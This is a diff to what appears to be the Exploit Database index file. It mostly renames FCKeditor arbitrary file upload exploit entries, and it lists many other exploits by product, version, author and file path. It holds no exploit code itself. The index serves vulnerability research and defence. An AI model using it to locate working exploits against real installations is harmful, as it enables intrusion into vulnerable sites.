+8060,platforms/php/webapps/8060.php,"Falt4 CMS RC4 - (fckeditor) Arbitrary File Upload Exploit",2009-02-16,Sp3shial,php,webapps,0
 8061,platforms/php/webapps/8061.pl,"simplePms CMS <= 0.1.4 - LFI / Remote Command Execution Exploit",2009-02-16,Osirys,php,webapps,0
 8062,platforms/php/webapps/8062.txt,"powermovielist 0.14b (sql/XSS) Multiple Vulnerabilities",2009-02-16,brain[pillow],php,webapps,0
 8063,platforms/php/webapps/8063.txt,"novaboard 1.0.0 - Multiple Vulnerabilities",2009-02-16,brain[pillow],php,webapps,0
@@ -10766,7 +10766,7 @@ id,file,description,date,author,platform,type,port
 11768,platforms/php/webapps/11768.txt,"Newbie CMS File Disclosure Vulnerability",2010-03-15,JIKO,php,webapps,0
 11769,platforms/hardware/dos/11769.py,"iPhone Springboard Malformed Character Crash PoC",2010-03-15,"Chase Higgins",hardware,dos,0
 11770,platforms/linux/dos/11770.txt,"WFTPD 3.3 - Remote REST DoS",2010-03-16,dmnt,linux,dos,21
-11771,platforms/php/webapps/11771.txt,"osCMax 2.0 (fckeditor) Remote File Upload",2010-03-16,ITSecTeam,php,webapps,0
+11771,platforms/php/webapps/11771.txt,"osCMax 2.0 - (fckeditor) Remote File Upload",2010-03-16,ITSecTeam,php,webapps,0
 11772,platforms/php/webapps/11772.txt,"Joomla Component com_rwcards - Local File Inclusion",2010-03-16,"ALTBTA ",php,webapps,0
 11773,platforms/php/webapps/11773.txt,"Free Real Estate Contact Form 1.09 - Local File Inclusion",2010-03-16,"Pouya Daneshmand",php,webapps,0
 11774,platforms/php/webapps/11774.txt,"Online Community CMS by I-net SQL Injection Vulnerability",2010-03-16,"Th3 RDX",php,webapps,0
@@ -11192,9 +11192,9 @@ id,file,description,date,author,platform,type,port
 12248,platforms/windows/remote/12248.html,"Magneto Net Resource ActiveX 4.0.0.5 - NetConnectionEnum Exploit (Universal)",2010-04-15,dookie,windows,remote,0
 12249,platforms/php/webapps/12249.txt,"60cycleCMS 2.5.2 - (DOCUMENT_ROOT) Multiple Local File Inclusion Vulnerability",2010-04-15,eidelweiss,php,webapps,0
 12250,platforms/windows/remote/12250.html,"Magneto Net Resource ActiveX 4.0.0.5 - NetShareEnum Exploit (Universal)",2010-04-15,dookie,windows,remote,0
-12251,platforms/php/webapps/12251.php,"Camiro-CMS_beta-0.1 (fckeditor) Remote Arbitrary File Upload Exploit",2010-04-15,eidelweiss,php,webapps,0
+12251,platforms/php/webapps/12251.php,"Camiro-CMS_beta-0.1 - (fckeditor) Remote Arbitrary File Upload Exploit",2010-04-15,eidelweiss,php,webapps,0
 12252,platforms/hardware/dos/12252.txt,"IBM BladeCenter Management Module - DoS Vulnerability",2010-04-15,"Alexey Sintsov",hardware,dos,0
-12254,platforms/php/webapps/12254.txt,"CMS (fckeditor) Remote Arbitrary File Upload Exploit",2010-04-16,Mr.MLL,php,webapps,0
+12254,platforms/php/webapps/12254.txt,"FCKEditor Core - (FileManager - test.html) Remote Arbitrary File Upload Exploit",2010-04-16,Mr.MLL,php,webapps,0
 12255,platforms/windows/local/12255.rb,"Winamp 5.572 - whatsnew.txt SEH (meta)",2010-04-16,blake,windows,local,0
 12256,platforms/php/webapps/12256.txt,"ilchClan <= 1.0.5B SQL Injection Vulnerability Exploit",2010-04-16,"Easy Laster",php,webapps,0
 12257,platforms/php/webapps/12257.txt,"joomla component com_manager 1.5.3 - (id) SQL Injection Vulnerability",2010-04-16,"Islam DefenDers Mr.HaMaDa",php,webapps,0
@@ -11304,7 +11304,7 @@ id,file,description,date,author,platform,type,port
 12378,platforms/php/webapps/12378.txt,"CMS Firebrand Tec Local File Inclusion Vulnerability",2010-04-25,R3VAN_BASTARD,php,webapps,0
 12379,platforms/windows/local/12379.php,"Easyzip 2000 3.5 - (.zip) Stack Buffer Overflow PoC Exploit (0day)",2010-04-25,mr_me,windows,local,0
 12380,platforms/windows/remote/12380.pl,"Rumba ftp Client 4.2 PASV BoF (SEH)",2010-04-25,zombiefx,windows,remote,0
-12381,platforms/php/webapps/12381.php,"phpegasus (fckeditor) Remote Arbitrary File Upload Exploit",2010-04-25,eidelweiss,php,webapps,0
+12381,platforms/php/webapps/12381.php,"phpegasus 0.1.2 - (fckeditor) Remote Arbitrary File Upload Exploit",2010-04-25,eidelweiss,php,webapps,0
 12382,platforms/multiple/dos/12382.txt,"Invision Power Board - Denial of Service (0day)",2010-04-25,SeeMe,multiple,dos,0
 12383,platforms/php/webapps/12383.txt,"clipak Upload Vulnerability",2010-04-25,indoushka,php,webapps,0
 12384,platforms/php/webapps/12384.txt,"Powered by iNetScripts: Shell Upload Vulnerability",2010-04-25,Sec-q8,php,webapps,0
@@ -11458,7 +11458,7 @@ id,file,description,date,author,platform,type,port
 12553,platforms/php/webapps/12553.txt,"Dark Hart Portal (login.php) Remote File Inclusion Vulnerability",2010-05-10,CoBRa_21,php,webapps,0
 12554,platforms/php/dos/12554.txt,"MiniManager For Mangos/Trinity Server DoS Vulnerability",2010-05-10,XroGuE,php,dos,0
 12555,platforms/multiple/dos/12555.txt,"Pargoon CMS - DoS Vulnerability",2010-05-10,"Pouya Daneshmand",multiple,dos,0
-12556,platforms/php/webapps/12556.txt,"Tadbir CMS (fckeditor) Remote Arbitrary File Upload Exploit Vulnerability",2010-05-10,"Pouya Daneshmand",php,webapps,0
+12556,platforms/php/webapps/12556.txt,"Tadbir CMS - (fckeditor) Remote Arbitrary File Upload Exploit Vulnerability",2010-05-10,"Pouya Daneshmand",php,webapps,0
 12557,platforms/php/webapps/12557.txt,"family connections 2.2.3 - Multiple Vulnerabilities",2010-05-10,"Salvatore Fresta",php,webapps,0
 12558,platforms/php/webapps/12558.txt,"29o3 CMS (LibDir) Multiple RFI Vulnerability",2010-05-10,eidelweiss,php,webapps,0
 12560,platforms/php/webapps/12560.txt,"724CMS Enterprise 4.59 - SQL Injection Vulnerability",2010-05-10,cyberlog,php,webapps,0
@@ -11485,7 +11485,7 @@ id,file,description,date,author,platform,type,port
 12581,platforms/windows/remote/12581.txt,"zervit Web Server 0.4 - Source Disclosure/Download",2010-05-12,Dr_IDE,windows,remote,0
 12582,platforms/windows/remote/12582.txt,"zervit Web Server 0.4 - Directory Traversals",2010-05-12,Dr_IDE,windows,remote,0
 12583,platforms/php/webapps/12583.txt,"e-webtech (fixed_page.asp) SQL Injection Vulnerability",2010-05-12,FL0RiX,php,webapps,0
-12584,platforms/php/webapps/12584.txt,"PolyPager 1.0rc10 (fckeditor) Remote Arbitrary File Upload Vulnerability",2010-05-12,eidelweiss,php,webapps,0
+12584,platforms/php/webapps/12584.txt,"PolyPager 1.0rc10 - (fckeditor) Remote Arbitrary File Upload Vulnerability",2010-05-12,eidelweiss,php,webapps,0
 12585,platforms/php/webapps/12585.txt,"4images <= 1.7.7 (image_utils.php) Remote Command Execution Vulnerability",2010-05-12,"Sn!pEr.S!Te Hacker",php,webapps,0
 12586,platforms/php/webapps/12586.php,"IPB 3.0.1 - SQL Injection Exploit",2010-05-13,Cryptovirus,php,webapps,0
 12587,platforms/linux/remote/12587.c,"WFTPD Server 3.30 - Multiple Vulnerabilities (0day)",2010-05-13,"fl0 fl0w",linux,remote,21
@@ -11584,7 +11584,7 @@ id,file,description,date,author,platform,type,port
 12687,platforms/windows/dos/12687.pl,"WinDirectAudio 1.0 - (.WAV) PoC",2010-05-21,ahwak2000,windows,dos,0
 12688,platforms/php/webapps/12688.txt,"JV2 Folder Gallery <= 3.1 - (gallery.php) Remote File Inclusion Vulnerability",2010-05-21,"Sn!pEr.S!Te Hacker",php,webapps,0
 12689,platforms/multiple/webapps/12689.txt,"Authenticated Cross-Site Scripting Vulnerability (XSS) within Apache Axis2 administration console",2010-05-21,"Richard Brain",multiple,webapps,0
-12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 (fckeditor) Arbitrary File Upload Exploit.",2010-05-21,Ma3sTr0-Dz,php,webapps,0
+12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 - (fckeditor) Arbitrary File Upload Exploit.",2010-05-21,Ma3sTr0-Dz,php,webapps,0
 12691,platforms/php/webapps/12691.txt,"Online Job Board (Auth Bypass) SQL Injection Vulnerability",2010-05-21,"cr4wl3r ",php,webapps,0
 14322,platforms/php/webapps/14322.txt,"Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability",2010-07-10,"L0rd CrusAd3r",php,webapps,0
 12692,platforms/php/webapps/12692.txt,"TinyBrowser Remote File upload Vulnerability",2010-05-22,Ra3cH,php,webapps,0
@@ -11592,7 +11592,7 @@ id,file,description,date,author,platform,type,port
 12694,platforms/php/webapps/12694.txt,"Tochin Ecommerce Multiple Remote Vulnerability",2010-05-22,cyberlog,php,webapps,0
 12695,platforms/php/webapps/12695.txt,"Azimut Technologie Admin Login Bypass Vulnerability",2010-05-22,Ra3cH,php,webapps,0
 12696,platforms/php/webapps/12696.txt,"E-commerce Group (cat.php) SQL Injection Vulnerability",2010-05-22,"BLack Revenge",php,webapps,0
-12697,platforms/php/webapps/12697.php,"hustoj (fckeditor) Remote Arbitrary File Upload Exploit",2010-05-22,eidelweiss,php,webapps,0
+12697,platforms/php/webapps/12697.php,"hustoj - (fckeditor) Remote Arbitrary File Upload Exploit",2010-05-22,eidelweiss,php,webapps,0
 12698,platforms/windows/dos/12698.py,"Open&Compact Ftp Server 1.2 - _PORT_ command Remote DoS",2010-05-22,Ma3sTr0-Dz,windows,dos,0
 12699,platforms/php/webapps/12699.txt,"eWebEditor 1.x - (WYSIWYG) Remote File Upload",2010-05-22,Ma3sTr0-Dz,php,webapps,0
 12700,platforms/asp/webapps/12700.txt,"DotNetNuke Remote File upload Vulnerability",2010-05-22,"Ra3cH and Ma3sTr0-Dz",asp,webapps,0
@@ -12191,7 +12191,7 @@ id,file,description,date,author,platform,type,port
 13832,platforms/php/webapps/13832.txt,"ardeacore 2.2 - Remote File Inclusion Vulnerability",2010-06-11,"cr4wl3r ",php,webapps,0
 13833,platforms/php/webapps/13833.txt,"Parallels System Automation (PSA) Local File Inclusion Vulnerability",2010-06-11,"Pouya Daneshmand",php,webapps,0
 13834,platforms/windows/remote/13834.html,"Sygate Personal Firewall 5.6 build 2808 - ActiveX with DEP bypass",2010-06-11,Lincoln,windows,remote,0
-13835,platforms/php/webapps/13835.txt,"DaLogin 2.2 (FCKeditor) Remote Arbitrary File Upload Exploit",2010-06-11,eidelweiss,php,webapps,0
+13835,platforms/php/webapps/13835.txt,"DaLogin 2.2 - (FCKeditor) Remote Arbitrary File Upload Exploit",2010-06-11,eidelweiss,php,webapps,0
 13836,platforms/windows/dos/13836.py,"Solarwinds 10.4.0.13 - Denial of Service Exploit",2010-06-12,Nullthreat,windows,dos,0
 13837,platforms/windows/dos/13837.pl,"Media Player Classic 1.3.1774.0 - (mpcpl) Local DoS (PoC) (0day)",2010-06-12,R3d-D3V!L,windows,dos,0
 13838,platforms/windows/dos/13838.pl,"CP3 Studio PC Version - Denial of Service",2010-06-12,chap0,windows,dos,0
@@ -12240,11 +12240,11 @@ id,file,description,date,author,platform,type,port
 13890,platforms/php/webapps/13890.txt,"EZPX Photoblog 1.2 beta Remote File Inclusion Exploit",2010-06-16,sh00t0ut,php,webapps,0
 13891,platforms/asp/webapps/13891.html,"AspTR EXtended CSRF Bug",2010-06-16,FreWaL,asp,webapps,0
 13892,platforms/php/webapps/13892.txt,"PHPAuctionSystem Upload Vulnerability",2010-06-16,Sid3^effects,php,webapps,0
-13893,platforms/php/webapps/13893.txt,"Nakid CMS (fckeditor) Remote Arbitrary File Upload Exploit",2010-06-16,eidelweiss,php,webapps,0
+13893,platforms/php/webapps/13893.txt,"Nakid CMS 0.5.2 - (fckeditor) Remote Arbitrary File Upload Exploit",2010-06-16,eidelweiss,php,webapps,0
 13894,platforms/php/webapps/13894.txt,"2daybiz online classified system SQLi AND XSS Vulnerability",2010-06-16,Sid3^effects,php,webapps,0
 13895,platforms/windows/local/13895.py,"Rosoft Audio Converter 4.4.4 - Buffer Overflow",2010-06-16,blake,windows,local,0
 13897,platforms/php/webapps/13897.txt,"Real Estate SQL Injection Vulnerability",2010-06-16,"L0rd CrusAd3r",php,webapps,0
-13898,platforms/php/webapps/13898.pl,"DMSEasy0.9.7 (fckeditor) Arbitrary File Upload",2010-06-17,sh00t0ut,php,webapps,0
+13898,platforms/php/webapps/13898.pl,"DMSEasy 0.9.7 - (fckeditor) Arbitrary File Upload",2010-06-17,sh00t0ut,php,webapps,0
 13899,platforms/php/webapps/13899.txt,"Pithcms 0.9.5 - Local File Include Vulnerability",2010-06-17,sh00t0ut,php,webapps,0
 13900,platforms/php/webapps/13900.txt,"Easy Travel Portal SQl Vulnerable",2010-06-17,"L0rd CrusAd3r",php,webapps,0
 13901,platforms/php/webapps/13901.txt,"PenPals Authentication Bypass",2010-06-17,"L0rd CrusAd3r",php,webapps,0
@@ -12472,7 +12472,7 @@ id,file,description,date,author,platform,type,port
 14181,platforms/windows/remote/14181.py,"HP OpenView NNM getnnmdata.exe CGI Invalid ICount Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80
 14182,platforms/windows/remote/14182.py,"HP OpenView NNM getnnmdata.exe CGI Invalid Hostname Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80
 14192,platforms/asp/webapps/14192.txt,"Ziggurat Farsi CMS SQL Injection Vulnerability",2010-07-03,"Arash Saadatfar",asp,webapps,0
-14184,platforms/php/webapps/14184.txt,"SweetRice < 0.6.4 (fckeditor) Remote File Upload",2010-07-03,ITSecTeam,php,webapps,0
+14184,platforms/php/webapps/14184.txt,"SweetRice < 0.6.4 - (fckeditor) Remote File Upload",2010-07-03,ITSecTeam,php,webapps,0
 14185,platforms/multiple/dos/14185.py,"ISC-DHCPD Denial of Service",2010-07-03,sid,multiple,dos,0
 14191,platforms/windows/local/14191.pl,"ASX to MP3 Converter 3.1.2.1 - Local Buffer Overflow (SEH)",2010-07-03,Madjix,windows,local,0
 14186,platforms/php/webapps/14186.txt,"Family Connections Who is Chatting Add-On Remote File Inclusion Vulnerability",2010-07-03,lumut--,php,webapps,0
@@ -13254,7 +13254,7 @@ id,file,description,date,author,platform,type,port
 15599,platforms/windows/local/15599.py,"Xion Audio Player 1.0.127 - (m3u) Buffer Overflow Vulnerability",2010-11-23,0v3r,windows,local,0
 15600,platforms/windows/remote/15600.html,"Netcraft Toolbar 1.8.1 - Remote Code Execution Exploit",2010-11-23,Rew,windows,remote,0
 15601,platforms/windows/remote/15601.html,"ImageShack Toolbar 4.8.3.75 - Remote Code Execution Exploit",2010-11-23,Rew,windows,remote,0
-15602,platforms/php/webapps/15602.txt,"PHPMotion FCKeditor File Upload Vulnerability",2010-11-23,trycyber,php,webapps,0
+15602,platforms/php/webapps/15602.txt,"PHPMotion 1.62 - (FCKeditor) File Upload Vulnerability",2010-11-23,trycyber,php,webapps,0
 15605,platforms/php/webapps/15605.txt,"GetSimple CMS 2.01 - 2.02 - Administrative Credentials Disclosure",2010-11-24,"Michael Brooks",php,webapps,0
 15229,platforms/windows/dos/15229.pl,"FoxPlayer 2.3.0 - (.m3u) Buffer Overflow Vulnerability",2010-10-10,"Anastasios Monachos",windows,dos,0
 15230,platforms/asp/webapps/15230.txt,"Site2Nite Auto e-Manager SQL Injection Vulnerability",2010-10-10,KnocKout,asp,webapps,0
@@ -13300,7 +13300,7 @@ id,file,description,date,author,platform,type,port
 15279,platforms/windows/local/15279.rb,"FatPlayer 0.6b - (.wav) Buffer Overflow Vulnerability (SEH)",2010-10-18,"James Fitts",windows,local,0
 15280,platforms/php/webapps/15280.html,"Travel Portal Script Admin Password Change - CSRF Vulnerability",2010-10-19,KnocKout,php,webapps,0
 15276,platforms/php/webapps/15276.txt,"411cc Multiple SQL Injection Vulnerabilities",2010-10-18,KnocKout,php,webapps,0
-15277,platforms/php/webapps/15277.txt,"GeekLog 1.7.0 (fckeditor) Arbitrary File Upload Vulnerability",2010-10-18,"Kubanezi AHG",php,webapps,0
+15277,platforms/php/webapps/15277.txt,"GeekLog 1.7.0 - (fckeditor) Arbitrary File Upload Vulnerability",2010-10-18,"Kubanezi AHG",php,webapps,0
 15278,platforms/php/webapps/15278.txt,"CubeCart 2.0.1 - SQL Injection Vulnerability",2010-10-18,X_AviaTique_X,php,webapps,0
 15281,platforms/php/webapps/15281.html,"Event Ticket Portal Script Admin Password Change - CSRF Vulnerability",2010-10-19,KnocKout,php,webapps,0
 15283,platforms/windows/dos/15283.txt,"Hanso Converter <= 1.4.0 - (.ogg) Denial of Service Vulnerability",2010-10-19,anT!-Tr0J4n,windows,dos,0
@@ -13364,7 +13364,7 @@ id,file,description,date,author,platform,type,port
 15351,platforms/php/webapps/15351.rb,"mygamingladder MGL Combo System <= 7.5 game.php SQL Injection Exploit",2010-10-29,"Easy Laster",php,webapps,0
 15352,platforms/windows/remote/15352.html,"Firefox 3.6.8 - 3.6.11 Interleaving document.write and appendChild Exploit (From the Wild)",2010-10-29,Unknown,windows,remote,0
 15353,platforms/php/webapps/15353.txt,"Joomla Component com_jfuploader < 2.12 - Remote File Upload",2010-10-30,Setr0nix,php,webapps,0
-15354,platforms/php/webapps/15354.txt,"Zoopeer 0.1 & 0.2 (fckeditor) Shell Upload Vulnerability",2010-10-30,Net.Edit0r,php,webapps,0
+15354,platforms/php/webapps/15354.txt,"Zoopeer 0.1 & 0.2 - (fckeditor) Shell Upload Vulnerability",2010-10-30,Net.Edit0r,php,webapps,0
 15355,platforms/php/webapps/15355.txt,"Simpli Easy (AFC Simple) Newsletter <= 4.2 - XSS/Information Leakage",2010-10-30,p0deje,php,webapps,0
 15356,platforms/windows/dos/15356.pl,"yPlay 2.4.5 - Denial of Service Vulnerability",2010-10-30,"MOHAMED ABDI",windows,dos,0
 15357,platforms/windows/remote/15357.php,"Home FTP Server 1.11.1.149 RETR DELE RMD - Remote Directory Traversal Exploit",2010-10-30,"Yakir Wizman",windows,remote,0
@@ -13388,7 +13388,7 @@ id,file,description,date,author,platform,type,port
 15385,platforms/php/webapps/15385.txt,"Kandidat CMS 1.4.2 Stored Cross-Site Scripting Vulnerability",2010-11-02,"High-Tech Bridge SA",php,webapps,0
 15386,platforms/php/webapps/15386.txt,"MemHT Portal 4.0.1 Stored Cross-Site Scripting Vulnerability",2010-11-02,"High-Tech Bridge SA",php,webapps,0
 15387,platforms/php/webapps/15387.txt,"Webmedia Explorer 6.13.1 Stored Cross-Site Scripting Vulnerability",2010-11-02,"High-Tech Bridge SA",php,webapps,0
-15389,platforms/php/webapps/15389.php,"MetInfo 3.0 (fckeditor) Arbitrary File Upload Vulnerability",2010-11-02,[sh3n],php,webapps,0
+15389,platforms/php/webapps/15389.php,"MetInfo 3.0 - (fckeditor) Arbitrary File Upload Vulnerability",2010-11-02,[sh3n],php,webapps,0
 15391,platforms/php/webapps/15391.txt,"Azaronline Design SQL Injection Vulnerability",2010-11-02,XroGuE,php,webapps,0
 15394,platforms/windows/dos/15394.txt,"Maxthon 3.0.18.1000 CSS Denial of Service Vulnerability",2010-11-02,4n0nym0us,windows,dos,0
 15395,platforms/asp/webapps/15395.txt,"Site2Ntite Vacation Rental (VRBO) Listings SQL Injection Vulnerability",2010-11-02,"L0rd CrusAd3r",asp,webapps,0
@@ -13444,7 +13444,7 @@ id,file,description,date,author,platform,type,port
 15452,platforms/php/webapps/15452.txt,"Punbb 1.3.4 - Multiple Full Path Disclosure Vulnerability",2010-11-07,SYSTEM_OVERIDE,php,webapps,0
 15453,platforms/php/webapps/15453.txt,"Joomla Component (com_ckforms) Local File Inclusion Vulnerability",2010-11-08,"ALTBTA ",php,webapps,0
 15454,platforms/php/webapps/15454.txt,"Joomla Component (com_clan) SQL Injection Vulnerability",2010-11-08,"AtT4CKxT3rR0r1ST ",php,webapps,0
-15455,platforms/php/webapps/15455.txt,"xt:Commerce Shopsoftware (fckeditor) Arbitrary File Upload Vulnerability",2010-11-08,Net.Edit0r,php,webapps,0
+15455,platforms/php/webapps/15455.txt,"xt:Commerce Shopsoftware 3 & 4 - (fckeditor) Arbitrary File Upload Vulnerability",2010-11-08,Net.Edit0r,php,webapps,0
 15456,platforms/php/webapps/15456.txt,"Joomla Component (com_clanlist) SQL Injection Vulnerability",2010-11-08,CoBRa_21,php,webapps,0
 15494,platforms/windows/dos/15494.pl,"VbsEdit 4.7.2.0 - (.vbs) Buffer Overflow Vulnerability",2010-11-12,anT!-Tr0J4n,windows,dos,0
 15495,platforms/windows/dos/15495.py,"Power Audio Editor 7.4.3.230 - (.cda) Denial of Service Vulnerability",2010-11-12,anT!-Tr0J4n,windows,dos,0
@@ -13461,7 +13461,7 @@ id,file,description,date,author,platform,type,port
 15468,platforms/php/webapps/15468.txt,"Joomla Component (btg_oglas) HTML & XSS Injection Vulnerability",2010-11-09,CoBRa_21,php,webapps,0
 15469,platforms/php/webapps/15469.txt,"Joomla Component (com_markt) SQL Injection Vulnerability",2010-11-09,CoBRa_21,php,webapps,0
 15470,platforms/php/webapps/15470.txt,"Joomla Component (com_img) LFI Vulnerability",2010-11-09,CoBRa_21,php,webapps,0
-15484,platforms/php/webapps/15484.txt,"FCKeditor 2.x <= 2.4.3 - Arbitrary File Upload Vulnerability",2010-11-10,grabz,php,webapps,0
+15484,platforms/php/webapps/15484.txt,"FCKEditor Core 2.x <= 2.4.3 - (FileManager - upload.php) Arbitrary File Upload Vulnerability",2010-11-10,grabz,php,webapps,0
 15472,platforms/php/webapps/15472.txt,"osCommerce 2.2 - CSRF",2010-11-09,daandeveloper33,php,webapps,0
 15473,platforms/multiple/webapps/15473.html,"IBM OmniFind CSRF Vulnerability",2010-11-09,"Fatih Kilic",multiple,webapps,0
 15474,platforms/multiple/dos/15474.txt,"IBM OmniFind Buffer Overflow Vulnerability",2010-11-09,"Fatih Kilic",multiple,dos,0
@@ -13829,7 +13829,7 @@ id,file,description,date,author,platform,type,port
 15946,platforms/windows/dos/15946.py,"IrfanView 4.28 - Multiple Denial of Service Vulnerabilities",2011-01-09,BraniX,windows,dos,0
 15958,platforms/php/webapps/15958.txt,"Joomla Captcha Plugin <= 4.5.1 - Local File Disclosure Vulnerability",2011-01-09,dun,php,webapps,0
 15959,platforms/windows/dos/15959.pl,"Macro Express Pro 4.2.2.1 MXE File Syntactic Analysis Buffer Overflow PoC",2011-01-10,LiquidWorm,windows,dos,0
-15960,platforms/php/webapps/15960.txt,"Maximus CMS (fckeditor) Arbitrary File Upload Vulnerability",2011-01-10,eidelweiss,php,webapps,0
+15960,platforms/php/webapps/15960.txt,"Maximus CMS 1.1.2 - (fckeditor) Arbitrary File Upload Vulnerability",2011-01-10,eidelweiss,php,webapps,0
 15962,platforms/solaris/local/15962.c,"Linux Kernel - Solaris < 5.10 138888-01 - Local Root Exploit",2011-01-10,peri.carding,solaris,local,0
 15963,platforms/windows/remote/15963.rb,"Windows Common Control Library (Comctl32) - Heap Overflow (MS10-081)",2011-01-10,"Nephi Johnson",windows,remote,0
 15964,platforms/php/webapps/15964.py,"Lotus CMS Fraise 3.0 - LFI - Remote Code Execution Exploit",2011-01-10,mr_me,php,webapps,0
@@ -15028,7 +15028,7 @@ id,file,description,date,author,platform,type,port
 17275,platforms/windows/local/17275.pl,"A-PDF All to MP3 Converter 2.0.0 - DEP Bypass",2011-05-12,h1ch4m,windows,local,0
 17276,platforms/windows/webapps/17276.txt,"Oracle GlassFish Server Administration Console Authentication Bypass",2011-05-12,"Core Security",windows,webapps,0
 17279,platforms/hardware/remote/17279.txt,"DreamBox DM500(+) - Arbitrary File Download Vulnerability",2011-05-13,LiquidWorm,hardware,remote,0
-17284,platforms/php/webapps/17284.txt,"EditorMonkey WordPress Plugin (FCKeditor) 2.5 - Arbitrary File Upload",2011-05-14,kaMtiEz,php,webapps,0
+17284,platforms/php/webapps/17284.txt,"EditorMonkey WordPress Plugin 2.5 - (FCKeditor) Arbitrary File Upload",2011-05-14,kaMtiEz,php,webapps,0
 17285,platforms/php/webapps/17285.php,"osCommerce 2.3.1 (banner_manager.php) Remote File Upload Vulnerability",2011-05-14,"Number 7",php,webapps,0
 17287,platforms/windows/dos/17287.mid,"Winamp 5.61 - 'in_midi' component heap Overflow (crash only)",2011-05-15,"Alexander Gavrun",windows,dos,0
 17288,platforms/php/webapps/17288.txt,"Joomla Component com_question - SQL Injection Vulnerability",2011-05-15,"NeX HaCkEr",php,webapps,0
@@ -15324,7 +15324,7 @@ id,file,description,date,author,platform,type,port
 17641,platforms/php/webapps/17641.txt,"Lasernet CMS 1.5 - SQL Injection Vulnerability",2011-08-09,p0pc0rn,php,webapps,0
 17642,platforms/windows/dos/17642.txt,"Acoustica Mixcraft 1.00 - Local Crash",2011-08-09,NassRawI,windows,dos,0
 17643,platforms/windows/dos/17643.pl,"Excel SLYK Format Parsing Buffer Overrun Vulnerability PoC",2011-08-09,webDEViL,windows,dos,0
-17644,platforms/php/webapps/17644.txt,"FCKeditor - Arbitrary File Upload Vulnerability",2011-08-09,pentesters.ir,php,webapps,0
+17644,platforms/php/webapps/17644.txt,"FCKEditor Core - (FileManager - test.html) Arbitrary File Upload Vulnerability",2011-08-09,pentesters.ir,php,webapps,0
 17645,platforms/hardware/remote/17645.py,"iphone/ipad phone drive 1.1.1 - Directory Traversal",2011-08-09,IRCRASH,hardware,remote,0
 17646,platforms/php/webapps/17646.txt,"TNR Enhanced Joomla Search <= SQL Injection Vulnerability",2011-08-09,NoGe,php,webapps,0
 17647,platforms/windows/local/17647.rb,"A-PDF All to MP3 2.3.0 - Universal DEP Bypass Exploit",2011-08-10,"C4SS!0 G0M3S",windows,local,0
@@ -20250,7 +20250,7 @@ id,file,description,date,author,platform,type,port
 23001,platforms/php/webapps/23001.txt,"Invision Power Board 1.0/1.1/1.2 Admin.PHP Cross-Site Scripting Vulnerability",2003-08-09,"Boy Bear",php,webapps,0
 23002,platforms/windows/remote/23002.txt,"MDaemon SMTP Server 5.0.5 Null Password Authentication Vulnerability",2003-08-09,"Buckaroo Banzai",windows,remote,0
 23004,platforms/multiple/webapps/23004.txt,"Oracle OpenSSO 8.0 - Multiple XSS POST Injection Vulnerabilities",2012-11-29,LiquidWorm,multiple,webapps,0
-23005,platforms/asp/webapps/23005.txt,"FCKEditor ASP 2.6.8 - File Upload Protection Bypass",2012-11-29,"Soroush Dalili",asp,webapps,0
+23005,platforms/asp/webapps/23005.txt,"FCKEditor Core ASP 2.6.8 - File Upload Protection Bypass",2012-11-29,"Soroush Dalili",asp,webapps,0
 23017,platforms/php/webapps/23017.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 earch Module PDA_limit Parameter XSS",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0
 23018,platforms/php/webapps/23018.txt,"PHPOutsourcing Zorum 3.4 Path Disclosure Vulnerability",2003-08-11,"Zone-h Security Team",php,webapps,0
 23019,platforms/windows/remote/23019.c,"Microsoft Windows 2000 - Subnet Bandwidth Manager RSVP Server Authority Hijacking Vulnerability",2003-08-11,root@networkpenetration.com,windows,remote,0
@@ -32832,7 +32832,7 @@ id,file,description,date,author,platform,type,port
 36398,platforms/lin_x86/shellcode/36398.c,"Linux/x86 - TCP Bind Shell (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
 36407,platforms/php/webapps/36407.txt,"Elxis CMS 2009 administrator/index.php URI XSS",2011-12-05,"Ewerson Guimaraes",php,webapps,0
 36408,platforms/php/webapps/36408.txt,"WordPress Pretty Link Plugin 1.5.2 'pretty-bar.php' Cross Site Scripting Vulnerability",2011-12-06,Am!r,php,webapps,0
-36410,platforms/php/webapps/36410.txt,"Simple Machines Forum 1.1.15 ''fckeditor' Arbitrary File Upload Vulnerability",2011-12-06,HELLBOY,php,webapps,0
+36410,platforms/php/webapps/36410.txt,"Simple Machines Forum 1.1.15 - 'fckeditor' Arbitrary File Upload Vulnerability",2011-12-06,HELLBOY,php,webapps,0
 36412,platforms/windows/remote/36412.rb,"IPass Control Pipe Remote Command Execution",2015-03-16,metasploit,windows,remote,0
 36413,platforms/php/webapps/36413.txt,"WordPress SEO by Yoast 1.7.3.3 - Blind SQL Injection",2015-03-16,"Ryan Dewhurst",php,webapps,0
 36401,platforms/php/webapps/36401.txt,"AtMail 1.04 'func' Parameter Multiple Cross-Site Scripting Vulnerabilities",2011-12-01,Dognædis,php,webapps,0
@@ -33811,7 +33811,7 @@ id,file,description,date,author,platform,type,port
 37454,platforms/hardware/webapps/37454.txt,"D-Link DSP-W w110 v1.05b01 - Multiple Vulnerabilities",2015-07-01,DNO,hardware,webapps,0
 37499,platforms/php/webapps/37499.txt,"Phonalisa Multiple HTML-Injection Cross-Site Scripting",2012-07-12,"Benjamin Kunz Mejri",php,webapps,0
 37456,platforms/windows/dos/37456.html,"McAfee SiteAdvisor 3.7.2 (firefox) Use After Free PoC",2015-07-01,"Marcin Ressel",windows,dos,0
-37457,platforms/php/webapps/37457.html,"FCKEditor 'spellchecker.php' Cross Site Scripting Vulnerability",2012-06-25,"Emilio Pinna",php,webapps,0
+37457,platforms/php/webapps/37457.html,"FCKEditor Core - (Editor - 'spellchecker.php') Cross Site Scripting Vulnerability",2012-06-25,"Emilio Pinna",php,webapps,0
 37458,platforms/windows/dos/37458.pl,"Winamp 5.13 '.m3u' File Exception Handling Remote Denial of Service Vulnerability",2012-06-25,Dark-Puzzle,windows,dos,0
 37459,platforms/php/webapps/37459.txt,"Umapresence Local File Include and Arbitrary File Deletion Vulnerabilities",2012-06-25,"Sammy FORGIT",php,webapps,0
 37460,platforms/php/webapps/37460.txt,"Schoolhos CMS HTML Injection Vulnerabilities",2012-06-27,the_cyber_nuxbie,php,webapps,0
@@ -34037,3 +34037,7 @@ id,file,description,date,author,platform,type,port
